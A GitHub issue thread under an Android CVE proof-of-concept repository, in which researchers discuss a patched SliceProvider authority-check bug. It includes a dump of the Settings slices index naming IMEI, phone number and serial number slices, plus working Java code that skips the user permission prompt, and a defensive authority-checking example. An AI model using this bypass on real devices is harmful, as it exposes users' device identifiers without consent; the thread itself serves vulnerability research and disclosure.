michalbednarski / ReparcelBug

CVE-2017-0806 PoC (Android GateKeeperResponse writeToParcel/createFromParcel mismatch)

Regarding SliceProvider bug #1

Open heeeeen opened 4 years ago

heeeeen commented 4 years ago

Hi, michal

Just saw you got credited for another interesting bug about SliceProvider (https://android.googlesource.com/platform/frameworks/base/+/ce472cd14f7262a0f5b3ffe656af05ed673c8e08). I tried some research but got no result. It seems as if the attack could target some system slice provider like in Settings to get sensitive information? Could you give me some hint?

Thanks, heeeeen

michalbednarski commented 4 years ago

In the original PoC provided to Google I used content://android.settings.slices/action/battery_saver, but in general the bug could be used against any SliceProvider that doesn't care what uri authority (android.settings.slices in the above example) was requested.

The list of slices from system settings that can be accessed with this bug can be dumped from a rooted device once system settings slices are indexed (that is, once any of them has been accessed); you can use the official SliceViewer to view slices.

Normally, Slices can be accessed by the home screen and the assistant (the application selected to handle the home key long press); when another application tries to access a Slice it will receive a Slice with an Intent that can be used to request permission from the user. With this bug that permission prompt can be skipped and some Slices can be accessed (for example those from the list below; replace battery_saver in the uri specified above with the value from key to get their uri). There are a few other system settings Slices that are hardcoded in SettingsSliceProvider, but they are unaffected by this bug because they rely on uri authority matching.

$ adb shell "sqlite3 -line /data/user_de/0/com.android.settings/databases/slices_index.db 'SELECT * FROM slices_index;'"
                       key = phone_number
                     title = Phone number
                   summary =  
               screentitle = About emulated device
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.deviceinfo.aboutphone.MyDeviceInfoFragment
                controller = com.android.settings.deviceinfo.PhoneNumberPreferenceController
            platform_slice = 0
                slice_type = 0
unavailable_slice_subtitle = 

                       key = imei_info
                     title = IMEI
                   summary =  
               screentitle = About emulated device
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.deviceinfo.aboutphone.MyDeviceInfoFragment
                controller = com.android.settings.deviceinfo.imei.ImeiInfoPreferenceController
            platform_slice = 0
                slice_type = 0
unavailable_slice_subtitle = 

                       key = build_number
                     title = Build number
                   summary =  
               screentitle = About emulated device
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.deviceinfo.aboutphone.MyDeviceInfoFragment
                controller = com.android.settings.deviceinfo.BuildNumberPreferenceController
            platform_slice = 0
                slice_type = 0
unavailable_slice_subtitle = 

                       key = os_firmware_version
                     title = Android version
                   summary =  
               screentitle = Android version
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.deviceinfo.firmwareversion.FirmwareVersionSettings
                controller = com.android.settings.deviceinfo.firmwareversion.FirmwareVersionDetailPreferenceController
            platform_slice = 0
                slice_type = 0
unavailable_slice_subtitle = 

                       key = screen_magnification_gestures_preference_screen
                     title = Magnify with triple-tap
                   summary = 
               screentitle = Magnification
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.accessibility.MagnificationPreferenceFragment
                controller = com.android.settings.accessibility.MagnificationGesturesPreferenceController
            platform_slice = 0
                slice_type = 1
unavailable_slice_subtitle = 

                       key = battery_saver
                     title = Battery Saver
                   summary = Extend battery life
               screentitle = Battery Saver
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.fuelgauge.batterysaver.BatterySaverSettings
                controller = com.android.settings.fuelgauge.batterysaver.BatterySaverButtonPreferenceController
            platform_slice = 1
                slice_type = 1
unavailable_slice_subtitle = 

                       key = remote_volume
                     title = Cast volume
                   summary = 
               screentitle = Sound
                  keywords = 
                      icon = 2131231348
                  fragment = com.android.settings.notification.SoundSettings
                controller = com.android.settings.notification.RemoteVolumePreferenceController
            platform_slice = 0
                slice_type = 2
unavailable_slice_subtitle = 

                       key = media_volume
                     title = Media volume
                   summary = 
               screentitle = Sound
                  keywords = 
                      icon = 2131231069
                  fragment = com.android.settings.notification.SoundSettings
                controller = com.android.settings.notification.MediaVolumePreferenceController
            platform_slice = 0
                slice_type = 2
unavailable_slice_subtitle = 

                       key = call_volume
                     title = Call volume
                   summary = 
               screentitle = Sound
                  keywords = 
                      icon = 2131231059
                  fragment = com.android.settings.notification.SoundSettings
                controller = com.android.settings.notification.CallVolumePreferenceController
            platform_slice = 0
                slice_type = 2
unavailable_slice_subtitle = 

                       key = ring_volume
                     title = Ring volume
                   summary = 
               screentitle = Sound
                  keywords = 
                      icon = 2131231216
                  fragment = com.android.settings.notification.SoundSettings
                controller = com.android.settings.notification.RingVolumePreferenceController
            platform_slice = 0
                slice_type = 2
unavailable_slice_subtitle = 

                       key = alarm_volume
                     title = Alarm volume
                   summary = 
               screentitle = Sound
                  keywords = 
                      icon = 17302288
                  fragment = com.android.settings.notification.SoundSettings
                controller = com.android.settings.notification.AlarmVolumePreferenceController
            platform_slice = 0
                slice_type = 2
unavailable_slice_subtitle = 

                       key = vibrate_when_ringing
                     title = Vibrate for calls
                   summary = 
               screentitle = Sound
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.notification.SoundSettings
                controller = com.android.settings.notification.VibrateWhenRingPreferenceController
            platform_slice = 0
                slice_type = 1
unavailable_slice_subtitle = 

                       key = airplane_mode
                     title = Airplane mode
                   summary = 
               screentitle = Network & internet
                  keywords = 
                      icon = 2131230932
                  fragment = com.android.settings.network.NetworkDashboardFragment
                controller = com.android.settings.network.AirplaneModePreferenceController
            platform_slice = 1
                slice_type = 1
unavailable_slice_subtitle = 

                       key = auto_rotate
                     title = Auto-rotate screen
                   summary = 
               screentitle = Display
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.DisplaySettings
                controller = com.android.settings.display.AutoRotatePreferenceController
            platform_slice = 0
                slice_type = 1
unavailable_slice_subtitle = 

                       key = gesture_double_tap_power
                     title = Jump to camera
                   summary = To quickly open camera, press the power button twice. Works from any screen.
               screentitle = Jump to camera
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.gestures.DoubleTapPowerSettings
                controller = com.android.settings.gestures.DoubleTapPowerPreferenceController
            platform_slice = 0
                slice_type = 1
unavailable_slice_subtitle = 

                       key = notification_badging
                     title = Allow notification dots
                   summary = 
               screentitle = Notifications
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.notification.ConfigureNotificationSettings
                controller = com.android.settings.notification.BadgingNotificationPreferenceController
            platform_slice = 0
                slice_type = 1
unavailable_slice_subtitle = 

                       key = hardware_info_device_model
                     title = Model
                   summary =  
               screentitle = Model & hardware
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.deviceinfo.hardwareinfo.HardwareInfoFragment
                controller = com.android.settings.deviceinfo.hardwareinfo.DeviceModelPreferenceController
            platform_slice = 0
                slice_type = 0
unavailable_slice_subtitle = 

                       key = hardware_info_device_serial
                     title = Serial number
                   summary =  
               screentitle = Model & hardware
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.deviceinfo.hardwareinfo.HardwareInfoFragment
                controller = com.android.settings.deviceinfo.hardwareinfo.SerialNumberPreferenceController
            platform_slice = 0
                slice_type = 0
unavailable_slice_subtitle = 

                       key = hardware_info_device_revision
                     title = Hardware version
                   summary =  
               screentitle = Model & hardware
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.deviceinfo.hardwareinfo.HardwareInfoFragment
                controller = com.android.settings.deviceinfo.hardwareinfo.HardwareRevisionPreferenceController
            platform_slice = 0
                slice_type = 0
unavailable_slice_subtitle = 

heeeeen commented 4 years ago

Hi Michal, thank you so much for your detailed analysis!

heeeeen commented 4 years ago

Hi, Michal

Could you show me the PoC? I used the following code to call the SliceProvider directly:

    Bundle b = new Bundle();
    // Call the Settings slice provider by its authority, passing the slice uri to bind in the extras
    Uri uriCall = Uri.parse("content://android.settings.slices");
    Uri uri = Uri.parse("content://android.settings.slices/action/toggle_nfc");
    b.putParcelable("slice_uri", uri);

    ArrayList<SliceSpec> supportedSpecs = new ArrayList<SliceSpec>();
    supportedSpecs.add(new SliceSpec("androidx.app.slice.LIST", 1));
    supportedSpecs.add(new SliceSpec("androidx.slice.LIST", 1));
    supportedSpecs.add(new SliceSpec("androidx.app.slice.BASIC", 1));
    supportedSpecs.add(new SliceSpec("androidx.slice.BASIC", 1));

    b.putParcelableArrayList("supported_specs", supportedSpecs);

    Bundle responseBundle = getContentResolver().call(uriCall, "bind_slice", null, b);
    Log.d("heen", responseBundle.getParcelable("slice").toString());

But I get:

12-25 19:44:13.658 25797 25797 D heen    : slice:
12-25 19:44:13.658 25797 25797 D heen    :    image
12-25 19:44:13.658 25797 25797 D heen    :    text: Your Device wants to show Settings slices
12-25 19:44:13.658 25797 25797 D heen    :    int
12-25 19:44:13.658 25797 25797 D heen    :    slice:
12-25 19:44:13.658 25797 25797 D heen    :       image
12-25 19:44:13.658 25797 25797 D heen    :       action

It seems it still needs the user to grant the permission. Also, I found the fix to check the content provider authority. But how do you not specify the android.settings.slices authority when calling the uri content://android.settings.slices/action/battery_saver?

Merry Christmas! Regards, En He

michalbednarski commented 4 years ago

You'll need to replace the Uri authority (in uri in your code) to point to your own provider, as well as use sliceManager.grantSlicePermission to grant access to that Uri.

My code for that was:

    static final Uri TARGET_URI =
            Uri.parse("content://com.example.sliceuri.myprovider/action/battery_saver");
    static final Uri PROVIDER_URI =
            Uri.parse("content://android.settings.slices");

    private Slice doQuery() {
        SliceManager sliceManager = getSystemService(SliceManager.class);
        sliceManager.grantSlicePermission(getPackageName(), TARGET_URI);

        Bundle extras = new Bundle();
        extras.putParcelable("slice_uri", TARGET_URI);
        extras.putParcelableArrayList("supported_specs", new ArrayList<Parcelable>(Arrays.asList(
                new SliceSpec("androidx.slice.LIST", 1),
                new SliceSpec("androidx.app.slice.BASIC", 1),
                new SliceSpec("androidx.slice.BASIC", 1),
                new SliceSpec("androidx.app.slice.LIST", 1)
        )));
        Bundle result = getContentResolver().call(
                PROVIDER_URI,
                "bind_slice",
                null,
                extras
        );
        return result.getParcelable("slice");
    }

You'll also need to declare a provider with authority com.example.sliceuri.myprovider in AndroidManifest.xml. This provider doesn't need to actually do anything; just returning true from onCreate is a sufficient implementation.
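The check whose absence this thread exploits, as an added illustration that is not code from this issue, the repository, or the AOSP fix: a hypothetical androidx SliceProvider (assumed authority com.example.settingslike.slices, assumed slice keys) that refuses to bind any Uri whose authority is not its own, so the platform's permission decision for the caller-supplied slice_uri cannot be transplanted from a provider the caller controls.

```java
import android.net.Uri;
import androidx.slice.Slice;
import androidx.slice.SliceProvider;
import androidx.slice.builders.ListBuilder;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

// Hypothetical provider: the authority and the key names are assumptions made for
// this example, not values from the thread or from the Settings provider.
public class AuthorityCheckingSliceProvider extends SliceProvider {
    static final String AUTHORITY = "com.example.settingslike.slices";
    private static final Set<String> KNOWN_KEYS =
            new HashSet<>(Arrays.asList("battery_saver", "airplane_mode"));

    @Override
    public boolean onCreateSliceProvider() {
        return true;
    }

    // The platform decides whether the caller may see a slice based on the Uri the
    // caller put in "slice_uri". If that Uri names a foreign authority, the decision
    // was made for some other provider (possibly one the caller owns and has granted
    // itself access to), so content must only be served for this provider's own Uris.
    static boolean isOwnUri(Uri uri) {
        return uri != null
                && "content".equals(uri.getScheme())
                && AUTHORITY.equals(uri.getAuthority());
    }

    @Override
    public Slice onBindSlice(Uri sliceUri) {
        if (!isOwnUri(sliceUri)) {
            throw new SecurityException("Refusing to bind slice for foreign uri " + sliceUri);
        }
        String key = sliceUri.getLastPathSegment();   // e.g. "battery_saver"
        if (key == null || !KNOWN_KEYS.contains(key)) {
            return null;                                // unknown slice: nothing to show
        }
        ListBuilder list = new ListBuilder(getContext(), sliceUri, ListBuilder.INFINITY);
        list.addRow(new ListBuilder.RowBuilder()
                .setTitle("Setting: " + key)
                .setSubtitle("Served only for authority " + AUTHORITY));
        return list.build();
    }
}
```

With this check in place, a bind request carrying a slice_uri under another authority fails before any setting data is looked up, regardless of what permission the caller holds on that other Uri.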

heeeeen commented 4 years ago

Michal, thanks for your help and happy new year! I reproduced it successfully.

heeeeen commented 4 years ago

Hi Michal, thank you again!

I found another bug while researching your bug. :) I was wondering if there are other ways to reach you to talk about interesting Android bugs.

michalbednarski commented 4 years ago

Send me an email; you can find my address in the git log of this repository (it looks like GitHub doesn't show those in the web interface, and apparently spam bots rarely index them).